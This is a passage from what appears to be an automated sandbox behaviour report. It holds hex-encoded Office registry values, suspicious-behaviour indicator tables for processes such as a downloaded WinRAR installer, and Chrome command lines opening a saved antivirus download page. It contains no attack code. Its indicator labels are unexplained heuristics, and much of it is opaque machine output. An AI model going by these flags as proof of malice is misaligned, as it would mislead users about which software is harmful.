445546167222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e454353546573742e746573747661726961626c65222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e496e7369676874732e456e61626c65436f6d706c65785069766f745461626c65496e5069766f745461626c655265636f6d6d656e646572222c20225622203a20224d736f3a3a416e79547970657c75696e7431365f747c323b626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e496e7369676874732e456e61626c655069766f745461626c655265636f6d6d656e646572222c20225622203a20224d736f3a3a416e79547970657c75696e7431365f747c323b626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e496e7369676874732e5069766f745461626c655265636f6d6d656e64657252616e6b65725632222c20225622203a20224d736f3a3a416e79547970657c75696e7431365f747c323b626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e457863656c2e4e616d656453686565745669657750657273697374656e6365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e436f6e66696746657463684d616e61676572456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e44796e616d6963447069222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e457870466972737453657373696f6e5461736b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e4665617475726551756572794c6f676765722e456e61626c655374617469634c6f6767696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4578706572696d656e746174696f6e2e5472696d41707049644c697374546f4665746368222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e416c7761797346616c6c6261636b466f7253796e634261636b6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e44657072656361746546696c65536572766572496e666f54797065222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e456e61626c654261636b67726f756e6455706c6f6164222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4368616e6765476174652e5573654e65774d736f446f6354656c656d65747279496e697450617468222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e436865636b5265766973696f6e53747265616d457175616c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e436f6c6c616250726f7053746f726543616368655265736574436865636b6572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e436f7079546f43616c6c6261636b456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4373694c696d6974656446616c6c6261636b546f486c696e6b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e44534c49422e456e61626c654c6162656c73556e757365644f72436c6561726564436865636b222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446570726563617465436865636b5374617274735769746846696c654e616d65457869737473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446973616d626967756174654373694e6574776f726b436f6e6e65637469766974794572726f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446973636f52657472795374726174656779222c20225622203a2022696e7433325f747c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446973636f5374726963744d6f6465456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e446f63732e4d736f2e4f757473706163652e496e6974436163686546726f6d464948222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4472675570646174655265666572656e63657353796368726f6e6f7573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e44796e616d6963467261676d656e7453697a65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e456e61626c65466f726365486f73744d6f6465466f7253796e634261636b6564486f73744f6e4f70656e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4661696c43616c6c73546f5472616e73616374656453747265616d446174614265666f72654373694c6f616446696c65222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e4872446f776e6c6f616454656d704173796e634c4d54222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e496e637265617365644279746573427566666572657257696e646f7753697a65222c | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|3" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.5 = 207b205c224576656e74466c61675c22203a2032207d2c205c224544502a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d736f456e74657270726973654461746150726f74656374696f6e2a5c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22536861726564436f6d6d656e74735c22203a207b205c224576656e74735c22203a207b205c22436f6d6d6974436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166744173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166744e61746976655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22447261667453746174654d616e61676572456e644472616674696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456e644472616674696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506f737444726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244656c657465506f7374416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244656c657465546872656164416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245324550657266547261636b65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224472616674436172644d6f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244726166744361726452656e64657265645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d61726b436f6d6d656e744372656174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656f70656e546872656164416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225265736f6c7665546872656164416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172745265706c79506f737465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224162616e646f6e44726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469736361726444726166745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d6d656e74436f6e746578744368616e676564416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164436f6d6d656e74416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436c6f7365566965774576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6e74657874437265617465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684f70656e566965774576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368566965774368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368426567696e44726166744576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684361706162696c69746965734368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6d6d656e74734368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368436f6d6d656e7453656c65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368437265617465436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368446f634368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368456e64436f6d6d656e7453657373696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368456e6444726166744576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368466f63757350616e655472696767657265644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e6974436f6d6d656e7453657373696f6e4173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e697469616c52656e646572436f6d706c657465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224469737061746368496e76616c69644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463684c6f6164546872656164735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e654368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e65466f63757353746174654368616e6765644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636850616e65546f52656e6465724576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636853656c656374436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636853657448616c6650616e65446973706c61794d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244697370617463685468656d654368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446973706174636844656c657465436f6d6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c656172436f6d6d656e7453656c656374696f6e416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e74416374697669746965735c22203a207b205c224576656e74735c22203a207b205c2241637469766974794c6f6744697363617264466f72446f63756d656e744368616e67655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67547269676765724173796e635461736b576f726b65725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575654c6f61644173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565496e697446696c65506174685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565437265617465496e73616e63655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565417070656e644173796e6342617463685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565577269746541637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756552656d6f76654173796e6342617463685c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575655772697465446f63756d656e74496e666f4865616465725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756554727944656c657465456d70747946696c654173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565496e7365727441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e717565756541637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6741646441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674372656174654c6f675c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67536176654e657746696c655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674469736361726441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e71756575654c6f63616c4e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e71756575654f7574676f696e674e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575654469736361726441637469766974794e6f6e437269746963616c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224170694f70656e41637469766974794c6f675769746853747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6741646441637469766974795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674361636865446f63756d656e74496e666f5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e74727946696e616c697a655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6746696c7465724f757443757272656e7455736572416374697669746965735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674c6f616446726f6d53747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f6753617665546f53747265616d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565436865636b5265766f6b65644544505c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565526570616972436f7272757074656446696c654173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f674d6f64696679436c6f6e655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c654f70656e4572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c65526561644572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c655265706c6163654572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d6974517565756546696c6557726974654572726f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d69745175657565536574456e74657270726973654461746150726f74656374696f6e4173796e635c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225472616e736d697451756575655472756e6361746551756575655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2241637469766974794c6f67456e7472794372656174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e74727953657453746174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22536572766963654163746976697479526573756c745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f674f6e436f6e74656e74416374696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e717565756541637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f674469736361726441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e736d69745175657565496e7365727441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225472616e736d697451756575654469736361726441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67456e71756575654f7574676f696e675c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2241637469766974794c6f67436c6f73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d6974517565756548656c706572456e737572654469726563746f72795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d697451756575654d616e61676572437265617465496e73616e63655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241706943726561746541637469766974794c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224170694372656174654c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736d69745175657565536574456e74657270726973654461746150726f74656374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241637469766974794c6f674173796e635461736b5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22436f6c6c6162436f726e65725c22203a207b205c224576656e74735c22203a207b205c22436f617574686f725570646174654c6f636174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f617574686f72476f546f43757272656e744c6f636174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572795573657252655265676973746572436f6e6e65637469766974794368616e67654e6f7469667949664e65636573736172795c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e6443686174427574746f6e497356697369626c654e6f7744617461706f696e745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c65727955736572436c6f736553696e676c65466c796f75745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e64497343686174417661696c61626c655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572794f6e436f617574686f72735265747269657665644173796e63506f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572795265747269657665436f617574686f72735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572794f6e436f617574686f72735265747269657665645c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c6572795265747269657665436f617574686f72734265666f72654173796e63506f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279496e6974464d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279436f617574686f72577261707065725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e64436f61757468696e6757697468416c6c4775657374734f724d697373696e67456d61696c456469746f72735c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22476f546f4c6f636174696f6e416374696f6e487562416374696f6e4a756d70546f417574686f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c65727955736572557064617465417574686f724c6f636174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c65727955736572557064617465456d61696c416e64436861745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6e7461637443617264416374696f6e487562416374696f6e53686f77436f6e74616374436172645c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279557365724a756d70546f417574686f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22436f6175746847616c6c657279557365724f70656e53696e676c65466c796f75745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22456d61696c416374696f6e487562416374696f6e53656e64456d61696c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f666669636543686174436f6d6d616e6453657456616c75655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224d736f494d5365727669636573536642506861736531496d70726f7665 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\winrar-x64-700.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\winrar-x64-700.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\winrar-x64-700.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\winrar-x64-700.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\winrar-x64-700.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\winrar-x64-700.exe | N/A |
| N/A | N/A | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\Panda Free Antivirus - Free download and software reviews - CNET Download.html
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffbb84d9758,0x7ffbb84d9768,0x7ffbb84d9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4532 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5032 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4972 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3984 --field-trial-handle=3084,i,14217130992253490921,11543335378077656547,262144 --variations-seed-version /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5356 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4592 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5100 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3676 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3088 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3148 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4628 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5972 --field-trial-handle=1884,i,11805682169299010824,3110703192083152218,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
